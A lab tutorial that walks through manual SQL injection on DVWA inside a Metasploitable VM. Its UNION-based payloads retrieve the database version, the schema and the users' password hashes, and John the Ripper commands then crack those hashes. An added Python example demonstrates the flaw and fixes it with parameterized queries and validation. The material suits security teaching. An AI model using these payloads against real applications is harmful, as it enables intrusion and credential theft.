In this lab, we'll begin a series on SQL injection. This will be a multi-part article/guide on SQL injection.
- Let's start with the lab setup (we will see these steps in detail in future posts):
Kali Linux (or BT 5r3) VM and Metasploitable VM in NAT mode.
> Check IP address of both devices.
Step-by-step instruction
Step 1:
Open Kali Linux (or BT 5r3)
Step 2:
Open your browser and go to http://<IP address of Metasploitable>/dvwa/login.php
Step 3:
Login with user name "admin" and password "password"
Step 4:
Click on DVWA Security and set it to low then submit
Step 5:
Click on manual SQL injection
Step 6:
In the User ID box, type 1 and click Submit
(PHP select statement: $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'";)
Step 7:
%' or '0'='0
(mysql> SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';)
Step 8:
Get DB version: %' or 0=0 union select null, version() #
Step 9:
Get DB user: %' or 0=0 union select null, user() #
Step 10:
Get DB name: %' or 0=0 union select null, database() #
Get schema information: %' and 1=0 union select null, table_name from information_schema.tables #
Step 11:
Get the user tables from the schema information: %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%'#
Get all the column fields of the users table from information_schema: %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
Step 12:
Let's get the password authentication hashes: %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
Now copy all the hashes into a text file in the format below
E.g. user:password
Save it to /pentest/passwords/john as dvwa_password.txt
Open a console and go to /pentest/passwords/john
cd /pentest/passwords/john
Now launch John the Ripper
./john --format=raw-MD5 dvwa_password.txt and hit enter.
(You will get the passwords)
...OK Gurkhas, we'll continue this in the next part.
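Why the Step 7 input returns every row, and what stops it, as an added example that is not part of the original lab. It uses Python with an in-memory SQLite table as a stand-in for DVWA's PHP/MySQL code; the sample rows and the function names are constructed for illustration.

```python
import sqlite3

def make_db():
    """Build an in-memory stand-in for the users table (constructed sample rows)."""
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id TEXT, first_name TEXT, last_name TEXT)")
    db.executemany(
        "INSERT INTO users VALUES (?, ?, ?)",
        [("1", "admin", "admin"), ("2", "Gordon", "Brown"), ("3", "Hack", "Me")],
    )
    return db

def lookup_vulnerable(db, user_id):
    # Same pattern as the lab's PHP statement: the input is pasted into the SQL
    # text, so a quote in the input ends the string literal and becomes syntax.
    query = "SELECT first_name, last_name FROM users WHERE user_id = '" + user_id + "'"
    return db.execute(query).fetchall()

def lookup_parameterized(db, user_id):
    # The placeholder keeps the value separate from the SQL text, so it is
    # only ever compared as data against user_id.
    query = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return db.execute(query, (user_id,)).fetchall()

def lookup_validated(db, user_id):
    # Defense in depth: the ID is numeric, so reject anything else up front.
    if not (user_id.isascii() and user_id.isdigit()):
        raise ValueError("user_id must be numeric")
    return lookup_parameterized(db, user_id)

if __name__ == "__main__":
    db = make_db()
    step7_input = "%' or '0'='0"  # the input string from Step 7 of this lab
    print("vulnerable, id=1:     ", lookup_vulnerable(db, "1"))
    print("vulnerable, step 7:   ", lookup_vulnerable(db, step7_input))
    print("parameterized, step 7:", lookup_parameterized(db, step7_input))
    try:
        lookup_validated(db, step7_input)
    except ValueError as err:
        print("validated, step 7:     rejected:", err)
```

The same fix applies in PHP with prepared statements (PDO or mysqli) instead of building `$getid` by string interpolation.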